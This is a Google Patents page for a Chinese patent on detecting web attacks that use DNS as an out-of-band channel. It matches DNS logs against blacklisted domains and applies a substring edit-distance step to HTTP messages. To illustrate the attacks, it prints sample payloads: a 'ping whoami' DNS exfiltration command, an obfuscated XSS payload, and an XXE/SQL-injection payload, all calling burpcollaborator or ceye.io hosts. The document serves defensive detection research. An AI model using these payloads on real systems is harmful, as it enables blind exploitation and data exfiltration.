CN111953638A - 网络攻击行为检测方法、装置及可读存储介质 - Google Patents
网络攻击行为检测方法、装置及可读存储介质 Download PDFInfo
- Publication number
- CN111953638A CN111953638A CN201910414132.1A CN201910414132A CN111953638A CN 111953638 A CN111953638 A CN 111953638A CN 201910414132 A CN201910414132 A CN 201910414132A CN 111953638 A CN111953638 A CN 111953638A
- Authority
- CN
- China
- Prior art keywords
- domain name
- message data
- risk
- http message
- risk domain
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/10—Network architectures or network communication protocols for network security for controlling access to devices or network resources
- H04L63/101—Access control lists [ACL]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
本申请公开了一种网络攻击行为检测方法、装置及可读存储介质,涉及网络安全技术。具体方案包括:获取预设时间范围内的域名系统DNS服务器中的日志文件和超文本传输协议HTTP报文数据;根据每个黑名单域名,判断所述日志文件中是否存在风险域名;针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率;如果存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名,将该HTTP报文数据作为攻击检测结果存储。本申请克服了现有技术中仅能检测攻击特征与回显特征明显的Web攻击方式的缺陷,可以检测通过第三方信息通道获得攻击结果回显的Web攻击方式,使检测Web攻击行为的方法更加全面。
Description
技术领域
本申请涉及网络安全技术,特别是涉及一种网络攻击行为检测方法、装置及可读存储介质。
背景技术
随着网络(Web)2.0时代的到来,基于Web环境的互联网应用越来越广泛,企业信息化的过程中,将各种应用架设在Web平台上,因此出现了大量的针对Web应用的漏洞攻击,如结构化查询语言(Structured Query Language,SQL)注入、跨站脚本攻击(Cross SiteScripting,XSS)、服务端请求伪造攻击(Server-Side Request Forgery,SSRF)等,且随着攻击者的职业化程度越来越高,针对Web应用的攻击手段和技术日趋高明、隐蔽,致使Web应用始终处在高风险环境下。
目前Web入侵检测系统(Web Intrusion Detection System,WebIDS)等基于流量数据包的威胁检测方法是针对Web攻击常用的检测手段,其大多通过旁路接入双向(客户端到服务器和服务器到客户端)流量数据包,通过在匹配引擎上设置一系列基于HTTP请求报文和HTTP响应报文的字符串或正则规则来检测Web攻击行为以及是否攻击成功。
然而,基于流量数据包的威胁检测方法,对Web攻击行为的实际检出效果往往取决于规则集对攻击行为特征的覆盖度,仅适用于HTTP请求报文和HTTP响应报文中的攻击特征与回显特征明显的Web攻击方式。如果此时Web攻击行为不通过HTTP响应报文进行攻击结果回显,或者HTTP请求报文和HTTP响应报文中的攻击特征与回显特征不明显,基于流量数据包的威胁检测方法无法检测出Web攻击行为。目前现有技术中尚未有能够检测通过第三方信息通道获得攻击结果回显的Web攻击方式的网络攻击行为检测方法,因此,现有技术中的检测Web攻击行为的方法检测维度单一,检测不够全面。
发明内容
有鉴于此,本申请的主要目的在于提供一种网络攻击行为检测方法,该方法克服了现有技术中仅能检测攻击特征与回显特征明显的Web攻击方式的缺陷,可以检测通过第三方信息通道获得攻击结果回显的Web攻击方式,使检测Web攻击行为的方法更加全面。
为了达到上述目的,本申请提出的技术方案为:
第一方面,本申请实施例提供了一种检测Web攻击行为的方法,包括:
获取预设时间范围内的域名系统DNS服务器中的日志文件和超文本传输协议HTTP报文数据;
获取包含至少一个黑名单域名的预设的黑名单,根据每个所述黑名单域名,判断所述日志文件中是否存在风险域名;如果存在风险域名,获取所述日志文件中的每个所述风险域名;所述风险域名中,包含所述黑名单中的至少一个黑名单域名;
针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率;
如果存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名,将该HTTP报文数据作为攻击检测结果存储。
一种可能的实施方式中,所述针对每个HTTP报文数据,利用该HTTP报文数据与每个风险域名进行比对,计算该HTTP报文数据包含所比对的风险域名的可能性几率的步骤,包括:
针对每个风险域名,计算该风险域名与该HTTP报文数据的子串编辑距离;所述子串编辑距离为,该HTTP报文数据中的每个与该风险域名字符个数相同的子报文字符串与该风险域名的编辑距离;
根据所述子串编辑距离与该风险域名的字符个数,计算该风险域名包含该HTTP报文数据的几率。
一种可能的实施方式中,所述计算该风险域名与该HTTP报文数据的子串编辑距离的步骤包括:
根据该风险域名的字符个数,从该HTTP报文数据中获取至少一个子报文字符串;所述子报文字符串为HTTP报文数据中截取的子字符串;每个所述子报文字符串,与该风险域名的字符个数相同;
根据该风险域名与每个子报文字符串,得到每个子报文字符串对应的编辑距离;
将每个子报文字符串对应的编辑距离中数值最小的,作为该风险域名与该HTTP报文数据的子串编辑距离。
一种可能的实施方式中,所述判断所述日志文件中是否存在风险域名的步骤之后,如果否,所述方法还包括:
获取至少一个预设的白名单域名,根据所述白名单域名,判断所述日志文件中是否存在灰色域名,如果是,获取所述日志文件中的每个所述灰色域名;所述灰色域名中,不包含所述黑名单域名,也不包含所述白名单域名;
逐一判断每个所述灰色域名是否为所述风险域名;
如果逐一判断,则继续执行所述针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率的步骤。
第二方面,基于相同的设计构思,本申请实施例还提供了一种网络攻击行为检测装置,包括:
获取模块,用于获取预设时间范围内的DNS服务器中的日志文件和超文本传输协议HTTP报文数据;还用于包含至少一个黑名单域名的预设的黑名单;
第一判断模块,用于根据每个所述黑名单域名,判断所述日志文件中是否存在风险域名;如果存在风险域名,获取所述日志文件中的每个所述风险域名;所述风险域名中,包含所述黑名单中的至少一个黑名单域名;
第二判断模块,用于针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率;还用于判断是否存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名;
记录模块,用于在存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名时,将该HTTP报文数据作为攻击检测结果存储。
一种可能的实施方式中,所述第二判断模块,包括:
编辑距离计算模块,用于针对每个风险域名,计算该风险域名与该HTTP报文数据的子串编辑距离;所述子串编辑距离为,该HTTP报文数据中的每个与该风险域名字符个数相同的子报文字符串与该风险域名的编辑距离;
几率计算模块,用于根据所述子串编辑距离与该风险域名的字符个数,计算该风险域名包含于该HTTP报文数据的几率。
一种可能的实施方式中,所述编辑距离计算模块,还用于:
根据该风险域名的字符个数,从该HTTP报文数据中获取至少一个子报文字符串;所述子报文字符串为HTTP报文数据中截取的子字符串;每个所述子报文字符串,与该风险域名的字符个数相同;
根据该风险域名与每个子报文字符串,得到每个子报文字符串对应的编辑距离;
将每个子报文字符串对应的编辑距离中数值最小的,作为该风险域名与该HTTP报文数据的子串编辑距离。
一种可能的实施方式中,所述获取模块,还用于获取至少一个预设的白名单域名;
所述第一判断模块,还用于根据所述白名单域名,判断所述日志文件中是否存在灰色域名,如果是,获取所述日志文件中的每个所述灰色域名;所述灰色域名中,不包含所述黑名单域名,也不包含所述白名单域名;
所述装置,还包括第三判断模块,用于逐一判断每个所述灰色域名是否为所述风险域名。
第三方面,本申请实施例还提供一种电子设备,包括存储器、处理器及存储在存储器上并可在处理器上运行的计算机程序,所述处理器执行所述程序时实现第一方面及第一方面中任一种可能的实施方式的步骤。
第四方面,本申请实施例还提供一种计算机可读存储介质,其上存储有计算机程序,该程序被处理器执行时实现第一方面及第一方面中任一种可能的实施方式的步骤。
综上所述,本申请通过黑名单域名,判断DNS服务器中的日志文件中是否记录了风险域名,并利用每个风险域名与HTTP报文数据进行比对,找到包含该风险域名的几率大于预设的几率阈值的HTTP报文数据,作为攻击检测结果。这样可以检测通过DNS服务器这一第三方信息通道获得攻击结果回显的Web攻击方式,使检测Web攻击行为的方法更加全面。
附图说明
图1为Web攻击行为的过程示意图;
图2为使用DNS服务器作为第三方信息通道进行Web攻击行为的数据传输架构示意图;
图3为DNS服务器的解析过程;
图4为本申请实施例一的流程示意图;
图5为本申请实施例二的流程示意图;
图6为本申请实施例二中的获取DNS服务器中的日志文件和HTTP报文数据的整体方案架构图;
图7为本申请实施例三的结构示意图;
图8为本申请实施例四的结构示意图。
具体实施方式
本申请实施例提供的一种网络攻击行为检测方法、装置及可读存储介质,应用于对Web攻击进行检测的场景中。为了更好理解本申请实施例方案,下面先进行详细分析:
图1是一种Web攻击行为的过程。如图1所示,通过由攻击端101发送含有有效载荷(Payload)的数据至被攻击服务器102,然后获取被攻击服务器102返回的响应数据(Response)。此时,对Web攻击行为的检测,可以通过检测攻击端101发送的HTTP请求报文中是否有Payload,以及被攻击服务器102是否返回包含响应数据的Response进行。然而随着攻防技术的对抗升级,越来越多的Web攻击行为不再采用如图1所示的响应方式,而是采用第三方信息通道获取攻击结果回显。因此Web攻击行为的攻击特征和回显特征不再明显,传统的基于流量数据包的威胁检测方法不再适用。
图2是另一种Web攻击行为的过程,具体是:使用域名系统(Domain Name System,DNS)服务器作为第三方信息通道进行Web攻击行为的数据传输架构示意图。
如图2所示,攻击端201与被攻击服务器202之间进行的数据交互,采用了DNS服务器作为第三方信息通道,经过了DNS服务器203的解析过程。具体的DNS服务器的解析过程如图3所示,包括:
S301:被攻击服务器202作为DNS服务器的客户端301,发送包含域名的DNS解析请求至默认DNS服务器302,为了方便理解,假设上述域名为test.example.com。
S302:默认DNS服务器302首先在本地缓存中查找上述域名与互联网协议(Internet Protocol,IP)地址的对应关系,如果未在本地缓存中查找到上述域名与IP地址的对应关系,会发送上述域名test.example.com的DNS查询请求至DNS顶级域名服务器303。
S303:DNS顶级域名服务器303解析上述域名test.example.com,得到上述域名test.example.com对应的一级域名example.com,从而得到一级域名example.com对应的域名DNS服务器地址,上述域名DNS服务器地址为ns.example.com,之后将上述域名DNS服务器地址发送给默认DNS服务器302。
S304:默认DNS服务器302继续发送携带上述域名test.example.com的查询请求给上述域名DNS服务器地址对应的域名DNS服务器304。
S305:域名DNS服务器304解析上述域名test.example.com之后,得到上述域名test.example.com对应的IP地址,假设,域名test.example.com对应的IP地址为192.168.10.5,之后,将上述IP地址192.168.10.5发送给默认DNS服务器302。
S306:默认DNS服务器302将收到的IP地址192.168.10.5发送给客户端301,例如,客户端301被攻击服务器202,因此,实际上将收到的IP地址192.168.10.5为发送给被攻击服务器202。
因此,如果攻击者201需要对加载了Web应用的Web服务器,也就是被攻击服务器202进行攻击,就建立一个私有域名,并将这个私有域名的域名DNS服务器203的IP地址设置为自己控制的公网服务器的IP地址,也就是将私有域名的域名DNS服务器203作为域名DNS服务器304。攻击者201可以在攻击用的HTTP请求报文中插入含有上述私有域名的Payload,那么被攻击服务器202关于上述私有域名的DNS解析请求都会被转发到攻击者自己的域名DNS服务器203上,通过检测攻击者自己的私有域名的解析记录,就可以找到上述Web应用的被攻击服务器202的漏洞所在,甚至可以用一些特殊的技巧通过DNS解析请求外发数据。
针对上述Web攻击行为,本申请实施例通过黑名单域名,判断DNS服务器中的日志文件中是否记录了风险域名,并利用每个风险域名与HTTP报文数据进行比对,找到包含该风险域名的几率大于预设的几率阈值的HTTP报文数据,将上述HTTP报文数据作为攻击检测结果。这样可以检测通过DNS服务器这一第三方信息通道获得攻击结果回显的Web攻击方式,使检测Web攻击行为的方法更加全面。
为使本申请的目的、技术方案和优点更加清楚,下面将结合附图及具体实施例对本申请作进一步地详细描述。
实施例一
图4为本申请实施例一的流程示意图,如图4所示,该实施例主要包括:
S401:获取预设时间范围内的域名系统DNS服务器中的日志文件和超文本传输协议HTTP报文数据。
示例性的,可以每个1小时获取DNS服务器中的日志文件和HTTP报文数据。这里,HTTP报文数据为一个字符串,是与HTTP报文有关的数据,通常可以包括HTTP请求报文的字符串,或者也可以包括HTTP响应报文的字符串,或者可以包括HTTP请求报文和HTTP响应报文的字符串,Web攻击行为产生的HTTP报文数据中通常包含了携带有攻击者私有域名的Payload。
根据上述Web攻击行为的过程可知,当Web应用存在漏洞的情况下,在利用DNS服务器作为第三方数据通道时,攻击者发送的携带含有私有域名的Payload的HTTP请求报文会产生DNS解析请求,并且上述DNS解析请求均需经由图3中的默认DNS服务器302的解析,因此,这里获取的DNS服务器中的日志文件,具体为获取图3中的默认DNS服务器302中的日志文件。
S402:获取包含至少一个黑名单域名的预设的黑名单,根据每个所述黑名单域名,判断所述日志文件中是否存在风险域名;如果存在风险域名,获取所述日志文件中的每个所述风险域名;所述风险域名中,包含所述黑名单中的至少一个黑名单域名。
具体的,黑名单域名为Web攻击行为通常会携带的私有域名,这里,黑名单域名可以为一级域名,也可以为二级域名。黑名单中存储了每个黑名单域名,黑名单中的黑名单可以根据历史攻击行为总结得到,也可以根据专家经验获取。
这里,风险域名为具有被网络攻击行为携带的可能性的域名。并且风险域名中包含黑名单中的至少一个黑名单域名的含义为,风险域名与黑名单域名是包含和被包含的关系,黑名单域名可以与风险域名相同,也可以是风险域名中的一个子字符串。也就是说,风险域名可以是与黑名单域名相同的域名,也可以是包含了黑名单域名的次级域名,例如,当黑名单域名是一级域名的情况下,风险域名可以是一个二级域名,且该二级域名中包含的一级域名与黑名单域名相同的。
S403:针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率。
如果日志文件中存在风险域名,那么可以确定出现了针对风险域名的DNS解析行为,也就是说出现了疑似Web攻击的行为。此时,需要进一步确定这一疑似Web攻击行为具体是如何进行的。Web攻击行为是通过HTTP请求报文进行的,因此,需要查找携带有Payload的HTTP请求报文。由于上述Payload包含有上述风险域名,因此,通过计算风险域名与HTTP报文数据中与风险域名的字符个数相同的子报文字符串的相似度,找到存在子报文字符串与风险域名之间相似度大于预设的相似度阈值的HTTP报文数据,即可找到包含风险域名的HTTP报文。同样的,也可确定该HTTP报文数据包含每个风险域名的几率,包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名的概念,与HTTP报文数据中存在子报文字符串与风险域名之间几率大于预设的几率阈值的概念是相同的。
S404:如果存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名,将该HTTP报文数据作为攻击检测结果存储。
具体的,通过找到与风险域名相似度大于预设的相似度阈值的子报文字符串所在的HTTP请求报文,也就是通过找到包含风险域名的几率大于预设的几率阈值的HTTP报文数据,可以得到具体的Web攻击行为的执行方式,因此将与风险域名相似度大于预设的相似度阈值的子报文字符串所在的HTTP报文数据,或者包含风险域名的几率大于预设的几率阈值的HTTP报文数据,作为攻击检测结果存储。
实施例二
如图5所示,为本申请实施例提供的网络攻击行为检测方法具体应用时的实施例,包括:
S501:获取预设时间范围内的DNS服务器中的日志文件和HTTP报文数据。
为了持续对网络攻击行为进行监控,可以每隔预设时间范围的时长,获取预设时间范围内的DNS。具体的,可以通过检测当前时间与上次检测任务的开始时间之间的时长是否大于等于预设的时长阈值进行,如果是,就获取预设时间范围内的DNS服务器中的日志文件和HTTP报文数据。
示例性的,可以把DNS服务器中的日志文件和HTTP报文数据整合到Hadoop分布式文件系统(Hadoop Distributed File System,HDFS)中。对于DNS服务器的日志文件主要来源是默认DNS服务器对域名地址的解析记录,通过syslog,例如DNSlog,转发至Kafka,然后从Kafka中读取日志文件写入HDFS中。HTTP报文数据来自负载均衡设备的转发的HTTP流量数据包,通过流量数据包采集程序将HTTP报文数据写入至HDFS中,这部分非本申请技术方案的重点,多种现有的方法均能实现,故不作具体阐述,可参考如图6所示的整体方案架构图。获取预设时间范围内的DNS服务器中的日志文件和HTTP报文数据之后,可以利用基于Hadoop的分布式计算框架MapReduce对日志文件和HTTP报文数据进行离线计算。
S502:基于预设的黑名单和预设的白名单对DNS服务器中的日志文件进行检索,判断DNS服务器中的日志文件中是否存在风险域名。
这里,预设的黑名单可以采用实施例一种的方法生成。白名单域名为不会成为Web攻击行为携带的域名的域名,白名单中存储了每个白名单域名。通常情况下,白名单中的白名单域名为内网域名,也可以根据专家经验获取白名单域名。
由于利用DNS服务器作为第三方数据通道的攻击行为越来越普遍,目前出现了一些免费公用的平台为验证漏洞提供辅助域名,如ceye.io、burpcollaborator.net等。这些平台提供的辅助域名的一级域名为平台提供方拥有,将随机生成的子域名提供给用户使用。攻击者为了节省成本,也普遍利用这些免费公用的平台提供的辅助域名作为私有域名,进行Web攻击行为。
以ceye.io平台为例,ceye.io平台是一个通过私有DNS服务器和HTTP服务器来检测DNS解析请求和HTTP访问请求的平台,每个用户会分配到一个唯一的二级域名,二级域名由一个唯一的6位随机字符与确定的一级域名.ceye.io拼接而成,例如b182oj.ceye.io,所有的对该二级域名及其子域名(即*.b182oj.ceye.io)的DNS解析请求和HTTP请求都会被ceye.io平台记录供用户查看,前面提到的burpcollaborator.net也是类似的平台。
假设攻击者想要通过执行命令whoami来查看存在命令执行漏洞应用的权限,但是响应报文中无相关回显,则可以执行类似如下的命令:#ping‘whoami’XXX.ceye.io,使被攻击服务器在访问攻击者的私有域名时,通过对私有域名的域名DNS服务器地址的DNS解析发送攻击者所需的数据,就可以看到攻击者通过私有域名“XXX.ceye.io”的域名DNS服务器的日志获得了whoami命令执行的结果。
而如果被攻击服务器不存在漏洞的情况下,默认DNS服务器不会受到DNS解析请求,也就不会访问攻击者私有域名的域名DNS服务器。因此,预设的黑名单中,可以将这些免费公用的平台的提供的一级域名作为黑名单域名,例如,ceye.io、burpcollaborator.net等。另外,还可以基于威胁情报信息和专家经验,获取攻击者常用的一些DNSlog平台或私有的主域名,作为上述黑名单中的黑名单域名。
根据每个黑名单域名,判断日志文件中是否存在风险域名的过程,包括:从日志文件中获取DNS服务器解析的每个解析域名,针对每个解析域名,依次将该解析域名与每个黑名单域名进行比对,如果存在至少一个黑名单域名与该解析域名相同,或者存在至少一个黑名单域名为该解析域名的子字符串,则该解析域名为风险域名。按照上述判断方法,获取日志文件中的每个风险域名。
另外,可以从DNS服务器中的日志文件中获取DNS服务器解析的每个解析域名,针对每个解析域名,依次将该解析域名与每个白名单域名进行比对,如果存在至少一个白名单域名与该解析域名相同,或者存在至少一个白名单域名为该解析域名的子字符串,则该解析域名为安全域名。不对上述安全域名进行分析。
进一步的,如果该解析域名既不包含黑名单域名,也不包含白名单域名。也就是说,不存在黑名单域名与该解析域名相同,也不存在黑名单域名为该解析域名的子字符串;同时,不存在白名单域名与该解析域名相同,也不存在白名单域名为该解析域名的子字符串。则该解析域名为灰色域名。此时,逐一判断每个灰色域名是否为所述风险域名。可以对灰色域名进行人工分析,根据专家经验判断该灰色域名是否为风险域名。也可以将上述灰色域名与每个HTTP报文数据进行比对,获取包含该灰色域名的几率大于预设的几率阈值的HTTP报文数据,根据上述包含该灰色域名的几率大于预设的几率阈值的HTTP报文数据,判断该灰色域名是否为风险域名。如果可以确定该灰色域名对应Web攻击行为,将该灰色域名作为黑名单域名加入到黑名单中。
如果DNS服务器中的日志文件中不存在风险域名,返回步骤S501,获取预设时间范围内的DNS服务器中的日志文件和HTTP报文数据。
S503:如果DNS服务器中的日志文件中存在风险域名,获取日志文件中的每个风险域名。针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的可能性几率。
具体的,可以将日志文件中的每个风险域名存储到Redis数据库中,以便进行后续的计算和分析。
由于在Web攻击行为中,攻击者的私有域名通常是显式的包含于HTTP请求报文中携带的Payload中的,因此,针对每个所述风险域名,利用该风险域名的文本与每个HTTP报文数据的文本进行比对,尤其是将该风险域名的文本与每个HTTP请求报文的文本进行比对。
示例性的,HTTP请求报文中携带的Payload可能会是一段恶意代码,如“javascript:/*<\/script><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+((new(image)).src=([]+/\\/yuwk6jn4ln21vum4wqpl8i2hc8iy62uthk59\\.burpcollaborator.net/).replace(/\\\\/g,[]))//'>”
或者,
“||(select extractvalue(xmltype('<?xml version="1.0"encoding="UTF-8"?><!DOCTYPE root[<!ENTITY%dfazc SYSTEM"http://yuwk6jn4ln21vum4wqpl8i2hc8iy62uthk59.burpcollab'||'orator.net/">%dfazc;]>'),'/l')from dual)||”
在上述例子中可以看到,攻击者利用恶意代码将攻击用的私有域名:“yuwk6jn4ln21vum4wqpl8i2hc8iy62uthk59.burpcollaborator.net”作了简单的混淆。此时,通过步骤S502获得的风险域名会是攻击用的私有域名:“yuwk6jn4ln21vum4wqpl8i2hc8iy62uthk59.burpcollaborator.net”。如果直接用步骤S502获得的风险域名与HTTP请求报文作简单的文本匹配,是无法成功检索到该风险域名对应的HTTP请求报文。
因此,本申请将通过判断风险域名包含于HTTP请求报文之间的几率是否大于预设的几率阈值,来判断HTTP请求报文是否为攻击检测结果。
具体的,针对每个风险域名,利用下述步骤1和步骤2,计算该HTTP报文数据包含每个风险域名的的几率:
步骤1、计算该风险域名与该HTTP报文数据的子串编辑距离。子串编辑距离为,该HTTP报文数据中的每个与该风险域名字符个数相同的子报文字符串与该风险域名的编辑距离。
编辑距离是针对两个字符串的差异程度的量化表示参数。
现有的编辑距离计算公式如下述公式(1)所示,用于计算关键词keyword和长文本之间的编辑距离:
其中,Edit(i,j)为,取keyword中从第一个字符开始长度为i的子字符串,与取长文本中从第一个字符开始的长度j的子字符串之间的编辑距离。[A[i]≠B[j]]为,使取keyword中从第一个字符开始长度为i的子字符串,变成取长文本中从第一个字符开始的长度j的子字符串,而进行的插入、删除和替换等总操作的最小次数。具体的,以keyword为aba,长文本为cdabbadc为例,根据公式(1)得到的编辑距离如表1所示。
表1以keyword为aba,长文本为cdabbadc为例的编辑距离求解
c | d | a | b | b | a | d | c | ||
0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | |
a | 1 | 1 | 2 | 2 | 3 | 4 | 5 | 6 | 7 |
b | 2 | 2 | 2 | 3 | 2 | 3 | 4 | 5 | 6 |
a | 3 | 3 | 3 | 2 | 3 | 3 | 3 | 4 | 5 |
此时,aba与长文本cdabbadc之间的编辑距离为表1中最右下角的数值,也就是说,aba与长文本cdabbadc之间的编辑距离为5。
传统的编辑距离求解方法,根据keyword与长文本中子字符串计算编辑距离,上述子字符串从长文本第一个字符开始的构建,每次构建的子字符串的字符个数加1。具体的,以keyword为aba,长文本为cdabbadc为例,aba首先与长文本的子字符串“c”计算得到编辑距离3,之后与长文本的子字符串“cd”计算得到编辑距离3,之后与长文本的子字符串“cda”计算得到编辑距离3,之后与长文本的子字符串“cdab”计算得到编辑距离2……直至与长文本“cdabbadc”计算得到编辑距离5。并且得到aba与长文本cdabbadc之间的编辑距离为5。
然而,以HTTP请求报文中携带的Payload是一段恶意代码为例,HTTP请求报文中携带的Payload有可能很长,风险域名仅仅是HTTP请求报文中的一小段,此时,采用传统的编辑距离计算方法,得到的风险域名与HTTP请求报文的编辑距离没有意义。因此,本申请实施例采用下述步骤A到步骤C计算风险域名与HTTP请求报文的子串编辑距离:
步骤A:根据该风险域名的字符个数,从该HTTP报文数据中获取至少一个子报文字符串;每个所述子报文字符串,与该风险域名的字符个数相同。
步骤B:根据该风险域名与每个子报文字符串,得到每个子报文字符串对应的编辑距离。
步骤C:将每个子报文字符串对应的编辑距离中数值最小的,作为该风险域名与该HTTP报文数据的子串编辑距离。
具体的,以keyword为aba,长文本为cdabbadc为例,根据上述步骤A到步骤C得到的子串编辑距离如表2所示。
表2以keyword为aba,长文本为cdabbadc为例的子串编辑距离求解
c | d | a | b | b | a | d | c | ||
0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | |
a | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 1 | 1 |
b | 2 | 2 | 2 | 1 | 0 | 1 | 1 | 1 | 2 |
a | 3 | 3 | 3 | 2 | 1 | 1 | 1 | 2 | 2 |
此时,aba与长文本cdabbadc之间的子串编辑距离为表1中最下一行的数值中数值大小最小的一个,也就是说,aba与长文本cdabbadc之间的编辑距离为1。通过将风险域名与HTTP报文数据中与风险域名的字符个数相同的子报文字符串进行比对,得到的子串编辑距离比传统方法得到的编辑距离更加准确,能达到更好的检测HTTP报文数据中是否存在携带有风险域名的Payload的技术效果。
步骤2、根据所述子串编辑距离与该风险域名的字符个数,计算该HTTP报文数据包含该风险域名的几率。
示例性的,可以采用下述公式2根据所述编辑距离与该风险域名的字符个数,确定该HTTP报文数据包含该风险域名的几率。
其中,P为该HTTP报文数据包含该风险域名的几率,Edit为该风险域名与该HTTP报文数据的子串编辑距离,N为该风险域名的字符个数。
S504:判断是否存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名。
将步骤S503计算得到的风险域名包含于HTTP报文数据的几率与预设的几率阈值进行比对,判断是否存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名。如果不存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名,执行步骤S506,判断是否每个HTTP报文数据均已经完成与风险域名的比对。
S505:如果存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名,将该HTTP报文数据作为攻击检测结果存储。
由于存在风险域名表示DNS服务器根据攻击者的Payload进行了DNS解析操作,可以视为一次得到了响应的Web攻击行为。包含上述风险域名的几率大于预设的几率阈值的HTTP报文数据为攻击者进行上述Web攻击行为使用的HTTP报文数据,且上述HTTP报文数据携带有攻击者的Payload,上述HTTP报文数据携带的Payload中包含上述风险域名。
因此,包含上述风险域名的几率大于预设的几率阈值的HTTP报文数据,可以作为攻击检测结果,可以将上述攻击检测结果存储,用于后续对攻击者的Web攻击行为进行深入分析。
S506:判断是否每个HTTP报文数据均已经完成与风险域名的比对,如果完成,返回步骤S501,获取预设时间范围内的域名系统DNS服务器中的日志文件和超文本传输协议HTTP报文数据;如果未完成,返回步骤S503,针对每个所述风险域名,利用该风险域名与每个HTTP报文数据进行比对,计算该HTTP报文数据包含每个风险域名的可能性几率。
基于相同的设计构思,本申请实施例还提供一种网络攻击行为检测装置、电子设备及可读存储介质。
实施例三
如图7所示,本申请实施例还提供了一种网络攻击行为检测装置700,包括:
获取模块701,用于获取预设时间范围内的DNS服务器中的日志文件和超文本传输协议HTTP报文数据;还用于包含至少一个黑名单域名的预设的黑名单;
第一判断模块702,用于根据每个所述黑名单域名,判断所述日志文件中是否存在风险域名;如果存在风险域名,获取所述日志文件中的每个所述风险域名;所述风险域名中,包含所述黑名单中的至少一个黑名单域名;
第二判断模块703,用于针对每个HTTP报文数据,利用该HTTP报文数据与获取的每个风险域名逐一进行比对,计算该HTTP报文数据包含所比对的风险域名的几率;还用于判断是否存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名;
记录模块704,用于在存在包含于该HTTP报文数据的几率大于预设的几率阈值的风险域名时,将该HTTP报文数据作为攻击检测结果存储。
一种可能的实施方式中,所述第二判断模块703,包括:
编辑距离计算模块7031,用于计算该风险域名与该HTTP报文数据的子串编辑距离;所述子串编辑距离为,该HTTP报文数据中的每个与该风险域名字符个数相同的子报文字符串与该风险域名的编辑距离;
几率计算模块7032,用于根据所述子串编辑距离与该风险域名的字符个数,计算该风险域名包含于该HTTP报文数据的几率。
一种可能的实施方式中,所述编辑距离计算模块7031,还用于:
根据该风险域名的字符个数,从该HTTP报文数据中获取至少一个子报文字符串;所述子报文字符串为HTTP报文数据中截取的子字符串;每个所述子报文字符串,与该风险域名的字符个数相同;
